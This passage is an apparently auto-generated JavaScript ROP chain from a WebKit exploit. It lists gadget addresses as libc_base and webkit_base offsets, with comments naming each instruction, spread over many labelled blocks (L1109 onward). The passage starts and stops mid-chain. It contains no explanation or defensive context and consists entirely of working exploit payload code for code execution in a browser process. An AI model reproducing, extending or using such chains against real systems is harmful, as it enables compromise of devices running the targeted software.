//L1109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1109: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1111: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+108888, //L1114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+108872, //L1112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1112: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1114: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109032, //L1117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109000, //L1115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+109016, //L1116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1115: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+109104, //L1119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1119: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+109160, //L1120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1120: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+109256, //L1123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1122: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1124: db([6, 0]); // 0x6 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+109352, //L1125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+109368, //L1126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1126: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+109456, //L1128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1128: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109512, //L1129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+109616, //L1131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1133: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+109736, //L1136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109720, //L1134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1134: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1136: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+109880, //L1139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+109848, //L1137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+109864, //L1138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1137: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1138: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1139: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+109952, //L1141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1141: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+110008, //L1142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1142: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+110104, //L1145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1144: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1145: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1146: db([22, 0]); // 0x16 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+110200, //L1147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+110216, //L1148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1147: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1148: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+110304, //L1150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110360, //L1151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+110432, //L1154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1154: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110488, //L1155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1155: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1157: libc_base+533450, //mov [rcx], rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+110624, //L1158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1158: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1160: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+110744, //L1163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+110728, //L1161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1163: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+110888, //L1166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+110856, //L1164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+110872, //L1165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1166: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+110960, //L1168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1168: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+111016, //L1169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1169: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+111112, //L1172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1171: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1173: db([23, 0]); // 0x17 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+111208, //L1174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+111224, //L1175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1175: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+111312, //L1177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1177: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+111368, //L1178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1178: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+111440, //L1181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1181: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+111496, //L1182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1182: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1184: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+111632, //L1185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1185: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1187: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+111752, //L1190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+111736, //L1188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1188: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1190: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+111896, //L1193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+111864, //L1191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+111880, //L1192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1191: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1192: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1193: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+111968, //L1195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1195: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+112024, //L1196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1196: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+112120, //L1199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1198: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1199: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1200: db([24, 0]); // 0x18 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+112216, //L1201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+112232, //L1202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1201: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1202: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+112320, //L1204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112376, //L1205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1205: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112448, //L1208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1208: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112504, //L1209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1209: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112592, //L1211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1211: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1213: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+112712, //L1216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+112696, //L1214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1216: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+112856, //L1219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+112824, //L1217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+112840, //L1218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1217: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1219: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+112928, //L1221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1221: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+112984, //L1222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113080, //L1225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1224: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1225: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1226: db([2, 0]); // 0x2 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+113176, //L1227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+113192, //L1228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1227: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+113280, //L1230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1230: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+113336, //L1231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+113440, //L1233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1233: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1235: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+113560, //L1238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+113544, //L1236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1236: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1238: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+113704, //L1241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+113672, //L1239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113688, //L1240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+113776, //L1243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1243: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+113832, //L1244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+113928, //L1247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1246: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1247: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1248: db([25, 0]); // 0x19 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+114024, //L1249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+114040, //L1250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1249: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1250: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+114128, //L1252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1252: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114184, //L1253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1253: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+114256, //L1256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1256: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114312, //L1257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1257: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1259: libc_base+756002, //mov [rdi], r8 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+114448, //L1260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1262: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+114568, //L1265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+114552, //L1263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1263: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1265: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+114712, //L1268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+114680, //L1266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+114696, //L1267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1266: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1268: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+114784, //L1270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1270: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+114840, //L1271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, 